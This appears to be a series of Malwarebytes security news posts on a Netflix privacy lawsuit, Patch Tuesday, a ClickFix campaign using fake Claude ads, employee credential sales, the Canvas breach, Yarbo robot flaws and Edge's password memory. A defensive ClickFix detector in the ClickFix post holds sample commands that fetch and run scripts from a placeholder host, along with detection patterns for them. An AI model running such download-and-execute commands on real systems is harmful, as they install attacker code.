Malwarebytes
Texas sued Netflix over claims it secretly collected and sold users’ data
Attorney General (AG) of Texas Ken Paxton announced that he sued Netflix for spying on Texans, including children, and collecting users’ data without their knowledge or consent.
The suit alleges Netflix secretly tracks and monetizes detailed viewing behavior of users, including children, while misleading users about its data practices. The case could reshape how Netflix collects data, targets ads, and designs “addictive” features, especially for minors.
According to the complaint, Netflix allegedly ran what the AG’s office calls a “surveillance program,” turning every click, pause, and binge session into data that could be sold to advertisers and data brokers.
Netflix firmly denies the accusations, calling the lawsuit “inaccurate” and claiming it complies with privacy laws wherever it operates. Spokesperson Jamil Walker said:
“The suit lacks merit and is based on inaccurate and distorted information.”
But regardless of how this specific case plays out, the lawsuit raises a bigger question for all subscribers: Just how much does your streaming service really know about you, and what does it do with that information?
The Texas complaint paints a picture of Netflix as a data company first and a streaming service second. Paxton’s office even describes Netflix as:
“A logging company that records and monetizes billions of behavioral events—and occasionally streams movies.”
The complaint also references a 2024 ruling by the Dutch Data Protection Authority, which said Netflix does not disclose the true scale or granularity of this data collection. The lawsuit claims Netflix did not just use this data internally for recommendations but also sold it to commercial data brokers and ad tech companies, generating “billions of dollars” annually.
The AG wants to stop the unlawful collection and disclosure of user data, require Netflix to disable autoplay by default on kids’ profiles, and impose other injunctive relief and civil penalties.
For customers, the main consequences could include potential changes to data collection, targeted advertising, autoplay defaults, and clearer consent and privacy controls. For subscribers on Netflix’s ad‑supported plans, this could slightly change how “personal” ads feel, at least in jurisdictions where regulators clamp down.
Plus, the lawsuit serves as a reminder that streaming habits may be far more trackable than users assumed. Even if Netflix ultimately wins or settles without admitting wrongdoing, the lawsuit puts a spotlight on what the company collects and why.
Netflix privacy and account settings
It will probably take a while before this lawsuit leads to any changes. But there are a few things you can do to protect your privacy:
- Netflix lets users view and remove entries from their watch history per profile, which can reduce how much historical behavior feeds into recommendations.
- Where available, turn off non‑essential marketing emails or in‑app promotions that rely on behavioral profiling.
- Use the parental controls Netflix offers you and turn off autoplay previews.
Basically, treat your Netflix account like any other online account: Review every profile, remove old ones, and take five minutes to walk through the privacy- and playback‑related options.
May 2026 Patch Tuesday: no zero-days but plenty to fix
This month’s Patch Tuesday remedies 137 security vulnerabilities, including 31 marked critical by Microsoft, with no zero-days actively exploited in the wild.
Microsoft defines a zero-day as “a flaw in software for which no official patch or security update is available yet.” This month, Microsoft has not observed any included vulnerability being exploited in production environments.
Still, this release is far from low-risk. A large chunk of the critical bugs allow remote code execution (RCE) across Windows services, Office, Azure, SharePoint, and graphics components. That means attackers who trick a user into opening a malicious document or lure them into connecting to a malicious service could gain full control of a system.
Two vulnerabilities to prioritize
From that list, we selected two that look like they could cause some trouble.
First is CVE-2026-40361, which has a CVSS score of 8.4 out of 10. It’s described as a critical use-after-free vulnerability in Microsoft Word that could allow an attacker to execute code locally on the affected system.
Use-after-free is a class of vulnerability caused by incorrect use of dynamic memory during a program’s operation. If, after freeing a memory location, a program does not clear the pointer to that memory, an attacker may be able to use the error to manipulate the program.
So, if an attacker convinces a user to open a malicious Word document, or even previews the file, they could execute arbitrary code with the privileges of the current user. That’s often enough to install malware, steal credentials, or move laterally through a network.
Second is CVE-2026-35421 (CVSS score 7.8 out of 10). This is a critical heap-based buffer overflow in the Windows Graphics Device Interface (GDI). A buffer overflow occurs when a program writes more data into a buffer than was allocated for it, so the excess spills into the adjacent memory region. Microsoft notes:
“For this vulnerability to be exploited, a user would need to open or otherwise process a specially crafted Enhanced Metafile (EMF) file using Microsoft Paint. This action is necessary to trigger the affected graphics functionality in the Windows component.”
How to apply fixes and check if you’re protected
These updates fix security problems and keep your Windows PC protected. Here’s how to make sure you’re up to date:
1. Open Settings
- Click the Start button (the Windows logo at the bottom left of your screen).
- Click on Settings (it looks like a little gear).
2. Go to Windows Update
- In the Settings window, select Windows Update (usually at the bottom of the menu on the left).
3. Check for updates
- Click the button that says Check for updates.
- Windows will search for the latest Patch Tuesday updates.
- If you have chosen to get the latest updates as soon as they’re available (a setting found under More options), you may see a Restart required message. Restart your system and the update will complete.
- If not, continue with the steps below.
4. Download and install
If updates are found, they’ll start downloading automatically. Once complete, you’ll see a button that says Install or Restart now.
- Click Install if needed and follow any prompts. Your computer will usually need a restart to finish the update. If it does, click Restart now.
5. Double-check you’re up to date
- After restarting, go back to Windows Update and check again. If it says You’re up to date, you’re all set!
Fake Claude search results lure Mac users into ClickFix attack
Researchers found that cybercriminals are using sponsored search results and shared Claude chats to lure victims into a typical ClickFix attack to install malware on macOS devices.
ClickFix is a social engineering method that tricks users into infecting their own device with malware. Users are instructed to run specific commands that will download malware, usually an infostealer.
The researchers found that when users search for terms like “Claude Mac download,” they may see sponsored Google results that appear to go to the legitimate claude.ai domain.
In reality, the ads resolve to real Claude shared chats, set up to look like official “Claude Code on Mac” or Apple Support guides. Independent research by BleepingComputer found another chat serving the same purpose. The chat instructs victims to open Terminal and paste a base64‑encoded command, which pulls a loader shell script from attacker‑controlled infrastructure and runs it in memory.
The script then profiles the system, pulls down a second-stage payload and runs it through osascript, macOS’s built-in scripting engine. This gives the attacker remote code execution (RCE) without ever dropping a traditional application or binary.
This results in a MacSync‑style payload that harvests browser credentials, cookies, Keychain contents, and crypto wallet data, bundles it, and sends all that information over HTTP to attacker servers.
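As an added example (not code from the original post or from the researchers), here is a defender-side heuristic that inspects a command a user is about to paste and flags the pattern described above: a base64-encoded blob decoded into a shell, a remote script piped straight into an interpreter, or inline osascript execution. The sample commands and hostnames are constructed placeholders; the check decodes base64 layers and rescans them, so a loader hidden inside the encoded text is still seen.

```python
import base64
import re

# Labelled regexes for the steps the chain above relies on: a base64-encoded
# command handed to the shell, a remote script piped straight into an
# interpreter, and inline AppleScript via osascript. Matching is case-insensitive.
INDICATORS = [
    ("base64-decoded text piped into a shell",
     r"base64\s+(?:-d|-D|--decode)\b[^|\n]*\|\s*(?:sh|bash|zsh)\b"),
    ("remote download piped straight into an interpreter",
     r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:sh|bash|zsh|osascript|python3?)\b"),
    ("inline AppleScript execution",
     r"\bosascript\s+-e\b"),
]
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decode_blobs(text):
    """Return the text of any base64 runs in `text` that decode to clean UTF-8."""
    found = []
    for blob in B64_BLOB.findall(text):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if all(ch.isprintable() or ch in "\n\t" for ch in decoded):
            found.append(decoded)
    return found


def analyze_command(text, depth=0):
    """Return (suspicious, reasons). Base64 layers are decoded and rescanned
    (two layers deep), so a loader hidden inside the encoded blob is still seen."""
    reasons = [label for label, pattern in INDICATORS
               if re.search(pattern, text, re.IGNORECASE)]
    if depth < 2:
        for inner in decode_blobs(text):
            _, inner_reasons = analyze_command(inner, depth + 1)
            reasons.extend(f"inside base64 layer {depth + 1}: {r}" for r in inner_reasons)
    return bool(reasons), reasons


# Constructed samples for the demo; the hostnames are placeholders, not real IoCs.
_STAGE1 = "curl -fsSL http://loader.example.invalid/stage1.sh | sh"
SAMPLES = {
    "benign_listing": "ls -la ~/Downloads",
    "benign_install": "brew install --cask some-editor",
    "encoded_loader": f"echo {base64.b64encode(_STAGE1.encode()).decode()} | base64 -d | bash",
    "plain_loader": "curl -s https://loader.example.invalid/x.sh | bash",
    "applescript_stage": "osascript -e 'display dialog \"constructed sample\"'",
}


def scan_samples():
    """Run every sample through the check; returns {name: (suspicious, reasons)}."""
    return {name: analyze_command(cmd) for name, cmd in SAMPLES.items()}


if __name__ == "__main__":
    for name, (flagged, why) in scan_samples().items():
        print(f"{name:18} {'SUSPICIOUS' if flagged else 'ok':10} {'; '.join(why)}")
```

The regexes are deliberately narrow heuristics for the chain this post describes, so treat a clean result as "nothing obvious", not as proof a command is safe.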
How to stay safe
Users running macOS Tahoe 26.4 and later will see warnings about possible ClickFix attacks, but other users still have to rely on common sense.
With ClickFix running rampant and inventing new methods all the time, it’s important to stay aware, cautious, and protected.
- Slow down. Don’t rush to follow instructions on a webpage or prompt, especially if it asks you to run commands on your device or copy and paste code. Attackers rely on urgency to bypass your critical thinking, so be cautious of pages urging immediate action. Sophisticated ClickFix pages add countdowns, user counters, or other pressure tactics to make you act quickly.
- Avoid running commands or scripts from untrusted sources. Never run code or commands copied from websites, emails, or messages unless you trust the source and understand what the action does.
- Verify instructions independently. If a website tells you to execute a command or perform a technical action, check through official documentation or contact support before proceeding.
- Limit copy and paste for commands. Manually typing commands instead of copy and paste can reduce the risk of unknowingly running malicious payloads hidden in copied text.
- Secure your devices. Use an up-to-date, real-time anti-malware solution with web protection. Malwarebytes blocks connections to unsafe sites like these.
- Educate yourself on evolving attack techniques. Understanding that attacks may come from unexpected places helps maintain vigilance. Keep reading our blog!
- Stay away from sponsored ads in search results. Anyone can buy them and make them look legitimate.
Pro tip: The free Malwarebytes Browser Guard extension warns you when a website tries to copy something to your clipboard.
1 in 8 employees have sold company logins or know someone who has
UK anti-fraud non-profit Cifas just published research that should bother anyone who runs a business, or buys from one: One in eight workers at large enterprises have either sold their company login credentials or know someone who did.
The internet is awash with compromised credentials that employees use to access company systems. Threat intelligence company KELA tracked nearly 2.9 billion compromised credentials globally in 2025. Most of these come from phishing attacks and infostealers. But thanks to employees wanting to make a quick buck, cybercriminals can simply make people an offer.
The insiders nobody’s watching
Cifas interviewed 2,000 employees of companies with at least 1,000 staff. Of these, 13% admitted to selling their corporate access credentials in the last 12 months, or knowing someone who did. Amazingly, as the report says, the sellers did so “often under the belief it’s harmless.”
Newsflash: Selling your account credentials isn’t harmless. Criminals want them so they can take over the account and do nefarious things with it. Account takeovers in the US surged 6% to over 78,000 last year, according to Verizon.
Many hijacked accounts are personal ones for services ranging from social media to online streaming sites, and of course bank accounts. But many others are accounts for business systems like Microsoft 365, Salesforce, and other platforms that hold sensitive company data. Those secrets are valuable commodities for criminals who can then trade them on the open market.
Your boss is more likely to sell than you
Ideally, this is where a common technique called “least-privilege access” should come in.
The idea is that a corporate online account should only have access to what it needs. So Jim in the canteen should have access to the food ordering system, but not to the entire customer database. That way, even if Jim’s account gets compromised, the worst the attackers could do is deprive you of sausages tomorrow.
The problem is that, according to the report, higher-ups are even more comfortable selling their account credentials than low-level employees. Thirty-two percent of senior managers find it justifiable, along with 36% of directors, 43% of C-suite executives, and, stunningly, four in five business owners. Their roles mean that even with least-privilege access, their accounts can still open routes to sensitive system functions and data.
This isn’t just a UK problem
The Cifas research is UK-specific, but that’s likely not where it ends. We’ve seen employees at several companies selling access to either company accounts or records. For example, cryptocurrency company Coinbase revealed last year that employees at a Bangladesh-based outsourcing company sold customer records to hackers.
Compromised credentials are widespread. Our own research found that in a single 30-day window, 111 Fortune 500 companies had employee credentials leaked. Long-term, 363 of those firms (that’s 73%) have lost control of at least one employee credential.
Employees selling their access credentials isn’t just bad for the companies that employ them. It’s also bad for customers.
When a director’s password goes up for sale, a customer file might not be far behind, although it likely won’t be the director selling it. Malwarebytes found that 91% of Fortune 500 companies have had their customers’ credentials leaked, and hijacked accounts are a great way to get at them.
So insider risk isn’t just a corporate issue. It’s also a consumer one. That makes us less likely to hand over our personal information to large enterprises without questioning why they need it.
Stolen Canvas data was “returned” after hacker agreement, Instructure says
The Instructure/Canvas data breach that has dominated cybersecurity coverage recently has reached a new stage.
Millions of students had personal data stolen, with extortion group ShinyHunters claiming credit for the data breach and applying extra pressure for their ransom demands by bothering Canvas users directly.
Which seems to have paid off. On the Instructure web page about the recent data breach, a status update dated May 11, 26 says:
“We know that concerns about the potential publication of data related to this incident remain top of mind for many customers. We understand how unsettling situations like this can be, and protecting our community remains our top priority.
With that responsibility in mind, Instructure reached an agreement with the unauthorized actor involved in this incident.”
This implies that Instructure has paid ShinyHunters. At least some of that money will almost certainly go toward funding future cybercrime operations. Whether companies should ever pay ransomware or extortion demands remains a contentious debate, and that is not an argument I want to reignite here.
What I don’t understand is the next phrase in the update:
“The data was returned to us.”
While that may be intended to sound reassuring, in cybersecurity, data is not a borrowed laptop or a misplaced folder. Once copied, it can be copied again, and again.
That matters because the incident wasn’t just about temporary access. Instructure said the unauthorized access involved usernames, email addresses, course names, enrollment information, and messages.
Data cannot simply be “returned”
So, when a company says the data was “returned” and “shred logs” were provided, the real question is not whether the attackers still possess the original files. It is whether copies were made, whether those copies were shared, and with whom: in essence, whether the breach’s downstream risks have actually been eliminated. While these types of cybercriminals tend to operate on trust, digital data does not come with a guaranteed recall function.
The good news is that Instructure says no passwords, dates of birth, government identifiers, or financial information were involved. But names, email addresses, course details, and private messages are still enough to fuel highly targeted phishing and social engineering long after the headlines fade.
For students and families, the practical advice from our original blog still applies:
- Reset Canvas‑related passwords
- Enable multi‑factor authentication where possible
- Monitor financial and credit activity as children get older
- Stay wary of highly personalized phishing that references real schools, courses, or teachers
Yarbo responds to robot flaws that could mow down their owners
A researcher found that Yarbo yard robots came with a host of vulnerabilities which, among other things, allowed an attacker to harvest Wi‑Fi passwords.
Security researcher Andreas Makris found he could remotely hijack thousands of Yarbo yard robots worldwide, and proved it by having his mower run him over. The root cause was a cluster of “legacy” design choices: every robot shared the same hardcoded root password, remote tunnels were left open, and Message Queuing Telemetry Transport (MQTT) messaging was so weakly protected that once you had one device, you effectively had the worldwide fleet.
An attacker could pull GPS coordinates, email addresses, and Wi‑Fi passwords, turn cameras into remote spying tools, and even re‑arm the mower after someone hit the emergency stop.
All of this was enabled by a persistent backdoor tunnel that users could neither see nor meaningfully control. The risks fell into three very different buckets:
- A heavy mower with remotely controllable blades and an emergency stop that can be bypassed is a real-world safety hazard.
- Exposed telemetry meant attackers could map where devices were, see who owned them, and in some reports even view camera feeds.
- Network abuse through shared root credentials meant compromised robots could scan local networks, steal more data, or be folded into a botnet.
Yarbo’s public response is unusually detailed for a consumer Internet of Things (IoT) vendor. It’s also refreshingly blunt in admitting that the researcher’s core findings were accurate. The company temporarily disabled the remote diagnostic tunnels, reset root passwords, locked down unauthenticated endpoints, and began ripping out unnecessary legacy access paths.
More importantly, Yarbo promises structural changes:
- Unique per‑device credentials.
- Over-the-Air (OTA) credential rotation.
- Audited, allowlist‑based remote diagnostics.
- Dedicated security contact, with a possible bug bounty to follow.
That is the sort of long‑term security hygiene we rarely see spelled out this clearly after an IoT fiasco.
From a disclosure and remediation standpoint, Yarbo is doing many things right: crediting the researcher, apologizing, prioritizing fixes, and explaining both short‑term patches and long‑term architectural changes in human language. For buyers of connected devices with blades, that level of transparency is a positive precedent.
But Yarbo has explicitly chosen to keep a remote access tunnel, although wrapped in better controls and logs, instead of offering users the option to remove or fully opt out of it.
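As an added example (not Yarbo’s code and not from the researcher’s write-up), here is the per-device credential and topic-authorization model those promised changes describe, in Python: every device gets its own secret stored only as a salted hash, rotation invalidates the previous secret immediately, and the ACL confines a device to its own MQTT topics so one compromised robot no longer sees the fleet. The topic layout (devices/<id>/telemetry and devices/<id>/cmd) and the device IDs are assumptions for the demo.

```python
import hashlib
import hmac
import secrets

PBKDF2_ROUNDS = 50_000  # kept low for a demo; raise for production use


class DeviceRegistry:
    """One secret per device, stored only as a salted PBKDF2 hash, with rotation."""

    def __init__(self):
        self._creds = {}  # device_id -> (salt, digest)

    @staticmethod
    def _digest(salt, secret):
        return hashlib.pbkdf2_hmac("sha256", secret.encode(), salt, PBKDF2_ROUNDS)

    def issue(self, device_id):
        """Create a fresh secret; it is returned once for delivery to the device."""
        secret = secrets.token_urlsafe(32)
        salt = secrets.token_bytes(16)
        self._creds[device_id] = (salt, self._digest(salt, secret))
        return secret

    def rotate(self, device_id):
        """OTA rotation: issuing a new secret invalidates the old one immediately."""
        if device_id not in self._creds:
            raise KeyError(f"unknown device {device_id}")
        return self.issue(device_id)

    def authenticate(self, device_id, secret):
        entry = self._creds.get(device_id)
        if entry is None:
            return False
        salt, expected = entry
        return hmac.compare_digest(expected, self._digest(salt, secret))


def topic_allowed(device_id, action, topic):
    """Per-device ACL (assumed topic layout). A device may publish only to
    devices/<id>/telemetry and subscribe only to devices/<id>/cmd. Wildcards are
    refused outright: a subscription to devices/# is exactly the fleet-wide view
    that a shared credential used to hand out."""
    if "#" in topic or "+" in topic:
        return False
    parts = topic.split("/")
    if len(parts) != 3 or parts[0] != "devices" or parts[1] != device_id:
        return False
    return {"publish": "telemetry", "subscribe": "cmd"}.get(action) == parts[2]


def broker_check(registry, device_id, secret, action, topic):
    """What a broker authentication/authorization hook would return for one request."""
    if not registry.authenticate(device_id, secret):
        return "auth-failed"
    if not topic_allowed(device_id, action, topic):
        return "acl-denied"
    return "ok"


if __name__ == "__main__":
    reg = DeviceRegistry()
    secret_a = reg.issue("mower-0001")  # constructed device ids
    reg.issue("mower-0002")
    print(broker_check(reg, "mower-0001", secret_a, "publish", "devices/mower-0001/telemetry"))
    print(broker_check(reg, "mower-0001", secret_a, "subscribe", "devices/#"))
    print(broker_check(reg, "mower-0001", secret_a, "subscribe", "devices/mower-0002/cmd"))
    secret_b = reg.rotate("mower-0001")
    print(broker_check(reg, "mower-0001", secret_a, "subscribe", "devices/mower-0001/cmd"))
    print(broker_check(reg, "mower-0001", secret_b, "subscribe", "devices/mower-0001/cmd"))
```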
How to secure IoT devices
The vulnerabilities uncovered in the Yarbo case present almost a live-action demo of what the IoT Cybersecurity Improvement Act is trying to prevent in US government deployments. While the Act doesn’t apply to Yarbo directly, its National Institute of Standards and Technology (NIST)-driven requirements map neatly onto what went wrong here.
So it’s still up to you, the user, to make sure you:
- Change the default credentials.
- Check if the vendor will make updates available and how easy it is to install them before buying an IoT product. And then install the updates when available.
- If you can, put your IoT devices on a separate network. Use a guest Wi‑Fi or separate VLAN when available.
- Disable what you don’t need. Turn off UPnP, remote access, cloud control, and unnecessary services if you’re not actively using them.
- If your router or security suite logs connections from IoT devices, skim those logs for odd spikes or unknown destinations.
A week in security (May 4 – May 10)
Last week on Malwarebytes Labs:
- Microsoft says Edge’s plaintext password behavior is “by design”
- ShinyHunters escalates Canvas attacks with school login defacements
- Massive AI investment scam network spans 15,500 domains
- If a fake moustache can fool age checks, is the Online Safety Act working?
- Google Chrome’s silent 4GB AI download problem
- Attackers adopt JavaScript runtime Bun to spread NWHStealer
- Millions of students’ personal data stolen in major education breach
- Update WhatsApp now: Two new flaws could expose you to malicious files
- Cyberattacks are raising your prices (Lock and Code S07E09)
- Thousands of Facebook accounts stolen by phishing emails sent through Google
- The 2026 World Cup scam economy is already running before the first whistle
Stay safe!
Microsoft says Edge’s plaintext password behavior is “by design”
Some time ago, we discussed whether you should allow your browser to remember your passwords.
In that article we mentioned the importance of encryption.
“With a browser password manager, someone with access to your browser could see your passwords in clear text, although Windows can be set to ask for authentication (the same you use at startup of your device).”
The typical behavior of browser password managers is to store passwords encrypted on disk, tied to your user account, and protected by the operating system.
But recently, a security researcher systematically tested every major Chromium-based browser for how they handle credentials in memory. The researcher found that Edge was the only one loading the entire password vault into plaintext process memory at startup, where it remains for the duration of the session.
Chrome and other Chromium browsers were observed to only decrypt a password when needed (autofill or “show password”), not the whole vault, and to use mechanisms like app‑bound encryption for keys. Edge does not use those protections in this context.
So, the researcher decided to write a proof-of-concept (PoC) demonstrating that accessing that vault doesn’t rely on zero-days or complex exploitation. It relies on the relatively simple ability to read process memory, which does require elevated privileges.
But when the researcher reported the issue to Microsoft, the response was underwhelming. The company’s official response was that the behavior is “by design.” The reasoning most likely is that this behavior speeds up sign‑in and autofill, and attackers would already need a compromised machine or elevated access to read RAM, which Microsoft treats as out of scope for this design decision.
Which is basically true. An attacker already needs significant foothold: for example, code execution on the box and the ability to read Edge’s process memory, often requiring elevated privileges. This is not a remote, unauthenticated bug in the browser, but the design makes post‑compromise credential harvesting easier. And it’s a capability many infostealers already have.
It’s just another thing an attacker can do once they’ve compromised your machine. Combined with this academic study from 2024, which found many password managers leak plaintext passwords into memory under some conditions, it leads us to repeat our advice.
Should you allow your browser to remember your passwords?
Your browser password manager gives you ease of use, but that costs you some security. Of course, standalone password managers aren’t foolproof either, so it’s important to decide for yourself where you store your passwords.
If you’re confident the website is safe, and anyone that can access it under your account won’t learn anything new, feel free to store the password in your browser, but disable autofill so you stay in control.
Use MFA where possible. It enormously reduces the risk should someone get hold of your password. And refrain from using the browser password manager to store your credit card details or other sensitive personally identifiable information, such as medical information.
But we’d add that, among the major browsers, Edge appears to be the weakest option if you still choose to use a built‑in password manager.
ShinyHunters escalates Canvas attacks with school login defacements
Days after confirming a major data breach, Instructure is now facing a second blow.
Earlier this week, Instructure confirmed a major data breach affecting its cloud‑hosted Canvas environment, with the ShinyHunters group claiming it stole hundreds of millions of records tied to thousands of schools and universities worldwide. As discussed in our earlier blog, that incident involved data such as student and staff records, enrollment details, and private messages allegedly accessed through Canvas export features and APIs. At that stage, the focus was on large‑scale data theft and the long‑term risks for affected students and families, including identity fraud and highly targeted phishing.
According to new reporting, ShinyHunters has now hit Instructure again, this time moving from quiet data theft to very visible extortion. Using another vulnerability in Instructure’s systems, the attackers were able to modify Canvas login portals for hundreds of educational institutions, defacing both web logins and the Canvas app with an on‑screen ransom message.
Image credit: vx-underground
The message both claimed responsibility for the earlier breach and set a deadline of May 12 for Instructure and affected schools to contact the gang or risk the public release of stolen data.
This second wave matters for two reasons. First, it confirms that ShinyHunters still has meaningful access to Instructure’s environment, or at least to components that control the look and behavior of school login pages. Second, it marks a clear escalation in pressure tactics, from leaked claims and dark web posts to messages shown directly to students, parents, and staff trying to access their courses.
How to deal with this data breach
For students and families, the practical advice from our original blog still applies:
- Reset Canvas‑related passwords
- Enable multi‑factor authentication where possible
- Monitor financial and credit activity as children get older
- Stay wary of highly personalized phishing that references real schools, courses, or teachers
For schools and districts, this latest extortion campaign underlines the need to coordinate closely with Instructure, review single sign-on (SSO) integrations, and prepare clear communications so that any future defacements or data leaks do not catch staff and parents by surprise.